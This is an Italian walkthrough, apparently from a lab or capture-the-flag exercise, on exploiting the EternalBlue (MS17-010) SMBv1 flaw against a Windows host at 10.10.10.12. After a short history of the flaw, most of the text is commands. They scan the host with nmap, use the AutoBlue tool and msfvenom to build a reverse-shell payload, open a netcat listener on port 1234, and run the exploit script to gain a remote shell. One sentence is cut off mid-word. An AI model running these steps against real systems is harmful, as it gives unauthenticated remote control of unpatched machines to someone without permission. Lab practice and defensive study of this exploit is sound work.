MS17-010 EternalBlue Exploit

Cybersecurity

EternalBlue è un exploit sviluppato dalla NSA e reso pubblico dal gruppo Shadow Brokers nel 2017, che sfrutta una vulnerabilità nel protocollo SMBv1 di Windows (MS17-010). Permette l'esecuzione di codice remoto senza autenticazione inviando pacchetti SMB appositamente creati. È stato utilizzato in attacchi su larga scala come WannaCry e NotPetya, causando danni globali a migliaia di sistemi vulnerabili.

sudo nmap -sV -p 445 -= 10.10.10.12

oppure usare Nmap per eseguite uno script per indetificare a qual CVE è vulnerabile

nmap -sV -p 445 script=smb-vuln-ms17-010 10.10.10.12

Utilizziamo questo tool, segui le istruzioni sulla pa

https://github.com/3ndG4me/AutoBlue-MS17-010

cd shellcode

chmod +x shell_prep.sh

./shell_prep.sh

Alla richiesta della compilazione della reverse shell con msfvenom, Y

Ora su LHOST mettiamo l IP della nostra macchina

Sulla LPORT metteremo 1234

Su meterpreter shell 1

Su staged payload 1

Ora scegliamo la shellcode che ha generato in base all architettura del nostro target

Impostiamo il listener

nc -nvlp 1234

Mentre netcat è in ascolto

chmod +x eternalblue_exploit7.py

Ora eseguiamo l exploit

python eternalblue_exploit7.py 10.10.10.12 shellcode/sc_x64.bin

Ora nella shell di netcat avremo eseguito la reverse shell del target

Eseguiamo

whoami//chi siamo